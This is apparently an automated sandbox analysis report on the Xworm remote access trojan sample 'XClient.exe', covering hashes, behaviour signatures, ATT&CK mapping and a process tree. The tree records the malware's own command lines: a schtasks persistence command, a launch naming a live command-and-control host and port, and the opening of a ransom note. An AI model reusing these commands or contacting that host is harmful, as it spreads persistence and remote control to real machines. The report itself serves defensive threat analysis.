Analysis

  • max time kernel
    543s
  • max time network
    572s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-03-2023 22:54

General

  • Target

    XClient.exe

  • Size

    67KB

  • MD5

    404dee8c8fe0b8c25ac39f60960dcbf0

  • SHA1

    078b5427a3c29a2f410f0e09f667389ad630ed60

  • SHA256

    90d2777179534bb5746559397a767aeee141f30a57b53c5d9c2122278b4bc4b7

  • SHA512

    9d7c6c2cceff330acea030002c4c7fde0a9ebe4f6a94a035e6fd6f08d7f5fea407680e5acd5baef687a19f40e116c47e8615dd4f728bdac7636529665e83956e

  • SSDEEP

    768:I9Zqr1TeXYQI9WFFTLmxVm2LXT8fbKQCQ/bm1f5Nc0Mrufk+NY1DT4sMOcPhoRcp:1r1g+wrXFfsybmtlMi2asMOasUbj

Malware Config

Signatures

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 25 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Sets desktop wallpaper using registry
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4440
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
      2⤵
      • Creates scheduled task(s)
      PID:4544
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\license.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:2204
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" considered-arrest.at.ply.gg 19159 <123456789> 14593F6BC62B5753650B
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4400
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3960
        • C:\Windows\SysWOW64\explorer.exe
          "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
          4⤵
            PID:3608
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -no-remote -profile "C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2084
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -no-remote -profile "C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data"
            4⤵
            • Checks processor information in registry
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3844
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.0.1623349399\38416098" -parentBuildID 20221007134813 -prefsHandle 1832 -prefMapHandle 1844 -prefsLen 17985 -prefMapSize 230913 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {637e6528-c7c6-425c-a520-0004d4924c14} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 1800 1512a105258 socket
              5⤵
                PID:2320
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.1.130972433\1006132501" -parentBuildID 20221007134813 -prefsHandle 2284 -prefMapHandle 2280 -prefsLen 18575 -prefMapSize 230913 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ba09e46-1913-4c95-babb-3b0500979e78} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 2304 1512a106a58 gpu
                5⤵
                  PID:4108
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.2.593025739\1588943721" -childID 1 -isForBrowser -prefsHandle 3316 -prefMapHandle 3312 -prefsLen 19419 -prefMapSize 230913 -jsInitHandle 1348 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9df89dc-188a-49dd-bd1f-7ab26ba0fd36} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 3372 1512d217858 tab
                  5⤵
                    PID:2628
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.3.141795002\218276330" -childID 2 -isForBrowser -prefsHandle 4052 -prefMapHandle 4048 -prefsLen 19527 -prefMapSize 230913 -jsInitHandle 1348 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2bb0b2f-eee4-4aa2-85d1-efe99e95848e} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 4060 1512d813558 tab
                    5⤵
                      PID:2072
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.4.147341061\873476646" -parentBuildID 20221007134813 -prefsHandle 3056 -prefMapHandle 3316 -prefsLen 21596 -prefMapSize 230913 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ce32e0a-e7d9-445f-a9e0-3f2ce66b1fb2} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 2732 1512e73d458 rdd
                      5⤵
                        PID:4360
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.5.1109982569\78315434" -childID 3 -isForBrowser -prefsHandle 4496 -prefMapHandle 5020 -prefsLen 27962 -prefMapSize 230913 -jsInitHandle 1348 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {84e6fa66-1cac-4021-846c-ce41567760a3} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 4480 1512fb56c58 tab
                        5⤵
                          PID:4964
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.6.644343843\748859219" -childID 4 -isForBrowser -prefsHandle 5204 -prefMapHandle 5072 -prefsLen 27962 -prefMapSize 230913 -jsInitHandle 1348 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e414c49-740f-4b13-8358-7111a6e9a904} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 4516 1512fb56058 tab
                          5⤵
                            PID:1360
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3844.7.1151823209\1843139894" -childID 5 -isForBrowser -prefsHandle 4360 -prefMapHandle 2784 -prefsLen 28134 -prefMapSize 230913 -jsInitHandle 1348 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {478088c7-29b4-4751-a756-165e7b936a2b} 3844 "\\.\pipe\gecko-crash-server-pipe.3844" 4364 15131a5fd58 tab
                            5⤵
                              PID:776
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
                        2⤵
                        • Enumerates system info in registry
                        • Modifies registry class
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        PID:6480
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93ab146f8,0x7ff93ab14708,0x7ff93ab14718
                          3⤵
                            PID:6532
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 /prefetch:3
                            3⤵
                              PID:6788
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
                              3⤵
                                PID:7140
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
                                3⤵
                                  PID:6988
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
                                  3⤵
                                    PID:2692
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
                                    3⤵
                                      PID:3524
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:8
                                      3⤵
                                        PID:7360
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                        3⤵
                                        • Drops file in Program Files directory
                                        PID:7436
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff655a85460,0x7ff655a85470,0x7ff655a85480
                                          4⤵
                                            PID:7472
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:8
                                          3⤵
                                            PID:7736
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
                                            3⤵
                                              PID:3176
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
                                              3⤵
                                                PID:7776
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
                                                3⤵
                                                  PID:8044
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
                                                  3⤵
                                                    PID:8048
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
                                                    3⤵
                                                      PID:1304
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,125416007928893542,5500782097280410354,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
                                                      3⤵
                                                        PID:1776
                                                  • C:\Windows\system32\taskmgr.exe
                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                    1⤵
                                                    • Checks SCSI registry key(s)
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:4932
                                                  • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                    C:\Users\Admin\AppData\Roaming\XClient.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4760
                                                  • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                    C:\Users\Admin\AppData\Roaming\XClient.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3240
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                    1⤵
                                                    • Modifies Internet Explorer settings
                                                    • Modifies registry class
                                                    • Suspicious behavior: AddClipboardFormatListener
                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:948
                                                    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                                      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Documents\BlockApprove.csv"
                                                      2⤵
                                                      • Checks processor information in registry
                                                      • Enumerates system info in registry
                                                      • Suspicious behavior: AddClipboardFormatListener
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1736
                                                  • C:\Windows\System32\rundll32.exe
                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
                                                    1⤵
                                                      PID:3632
                                                    • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                      C:\Users\Admin\AppData\Roaming\XClient.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3252
                                                    • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                      C:\Users\Admin\AppData\Roaming\XClient.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5124
                                                    • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                      C:\Users\Admin\AppData\Roaming\XClient.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:6388
                                                    • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                      C:\Users\Admin\AppData\Roaming\XClient.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5228
                                                    • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                      C:\Users\Admin\AppData\Roaming\XClient.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5216
                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                      1⤵
                                                        PID:7008
                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2276
                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5904

                                                      Network

                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                      Execution

                                                      Scheduled Task

                                                      1
                                                      T1053

                                                      Persistence

                                                      Registry Run Keys / Startup Folder

                                                      1
                                                      T1060

                                                      Scheduled Task

                                                      1
                                                      T1053

                                                      Privilege Escalation

                                                      Scheduled Task

                                                      1
                                                      T1053

                                                      Defense Evasion

                                                      Modify Registry

                                                      3
                                                      T1112

                                                      Discovery

                                                      Query Registry

                                                      5
                                                      T1012

                                                      System Information Discovery

                                                      5
                                                      T1082

                                                      Peripheral Device Discovery

                                                      1
                                                      T1120

                                                      Impact

                                                      Defacement

                                                      1
                                                      T1491

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\update-config.json
                                                        Filesize

                                                        102B

                                                        MD5

                                                        7d1d7e1db5d8d862de24415d9ec9aca4

                                                        SHA1

                                                        f4cdc5511c299005e775dc602e611b9c67a97c78

                                                        SHA256

                                                        ffad3b0fb11fc38ea243bf3f73e27a6034860709b39bf251ef3eca53d4c3afda

                                                        SHA512

                                                        1688c6725a3607c7b80dfcd6a8bea787f31c21e3368b31cb84635b727675f426b969899a378bd960bd3f27866023163b5460e7c681ae1fcb62f7829b03456477

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log
                                                        Filesize

                                                        654B

                                                        MD5

                                                        2ff39f6c7249774be85fd60a8f9a245e

                                                        SHA1

                                                        684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                        SHA256

                                                        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                        SHA512

                                                        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                        Filesize

                                                        152B

                                                        MD5

                                                        0820611471c1bb55fa7be7430c7c6329

                                                        SHA1

                                                        5ce7a9712722684223aced2522764c1e3a43fbb9

                                                        SHA256

                                                        f00d04749a374843bd118b41f669f8b0a20d76526c34b554c3ccac5ebd2f4f75

                                                        SHA512

                                                        77ea022b4265f3962f5e07a0a790f428c885da0cc11be0975285ce0eee4a2eec0a7cda9ea8f366dc2a946679b5dd927c5f94b527de6515856b68b8d08e435148

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                        Filesize

                                                        152B

                                                        MD5

                                                        425e83cc5a7b1f8edfbec7d986058b01

                                                        SHA1

                                                        432a90a25e714c618ff30631d9fdbe3606b0d0df

                                                        SHA256

                                                        060a2e5f65b8f3b79a8d4a0c54b877cfe032f558beb0888d6f810aaeef8579bd

                                                        SHA512

                                                        4bf074de60e7849ade26119ef778fe67ea47691efff45f3d5e0b25de2d06fcc6f95a2cfcdbed85759a5c078bb371fe57de725babda2f44290b4dc42d7b6001af

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
                                                        Filesize

                                                        70KB

                                                        MD5

                                                        e5e3377341056643b0494b6842c0b544

                                                        SHA1

                                                        d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                                        SHA256

                                                        e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                                        SHA512

                                                        83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_2
                                                        Filesize

                                                        8KB

                                                        MD5

                                                        0962291d6d367570bee5454721c17e11

                                                        SHA1

                                                        59d10a893ef321a706a9255176761366115bedcb

                                                        SHA256

                                                        ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                                                        SHA512

                                                        f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3
                                                        Filesize

                                                        8KB

                                                        MD5

                                                        41876349cb12d6db992f1309f22df3f0

                                                        SHA1

                                                        5cf26b3420fc0302cd0a71e8d029739b8765be27

                                                        SHA256

                                                        e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                                                        SHA512

                                                        e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
                                                        Filesize

                                                        2KB

                                                        MD5

                                                        ddb080936c7603f38152b6c7d1aaff64

                                                        SHA1

                                                        e667c168653c41fc268497163fd573601e50a67a

                                                        SHA256

                                                        c515682909569e354d798e43dad90c8e58099ed11eaf95cfef0e86129bbbc678

                                                        SHA512

                                                        95f89d4836a9b90cfcc9037546c866edd0ed08f9c85adff3cf581ac277bfbd6fc7e7d9509f324fa61a062f5ea4ba64f7d94e4f6cfe2198199da222dc8e811cb3

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                        Filesize

                                                        111B

                                                        MD5

                                                        285252a2f6327d41eab203dc2f402c67

                                                        SHA1

                                                        acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                        SHA256

                                                        5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                        SHA512

                                                        11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                        Filesize

                                                        4KB

                                                        MD5

                                                        fec2b73f0ffbd14e913a428b020e09ca

                                                        SHA1

                                                        16101975651d00bc7885e813abfabf1c39cee4a6

                                                        SHA256

                                                        abe19a3b39ea777f1dc756169987451a0f507952c6053f4763b4f44d1c6ff9ca

                                                        SHA512

                                                        15563a8877eb912b147908578f070bbd4f26ffb69901e3f0d0cf4861a6c78771fa334543f65b0dd490f9d8810abf8a0a8f94f885602d36f7b610bd9f415581f0

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                        Filesize

                                                        5KB

                                                        MD5

                                                        a1937be1afcd8099d93a30e5d08732d6

                                                        SHA1

                                                        8cf5bdc83d6c0c4bd86b4e7a516fb7e1bca80bc9

                                                        SHA256

                                                        bc4e4df556310d3c6686c67ceeffa66be3a2b6f4dbd44c5de76d9b6a7c19f266

                                                        SHA512

                                                        a4a4e1317ec23598c2d9331f0446023b11db94a4c562f3c050a593f48b3638277fa225f7c164759ba7efb65f458ef7d2a802c9b145dc5c3f029bbeee654e6955

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                        Filesize

                                                        5KB

                                                        MD5

                                                        e072c0bdd5a94f45a85edd38ad988277

                                                        SHA1

                                                        62ca35277f064d790e64164f43a15ce7a5e6bfcd

                                                        SHA256

                                                        7e53f347df72eb54cac9fda75fd77fa2e77882a94bea01ffe39d2dc5c5c5523a

                                                        SHA512

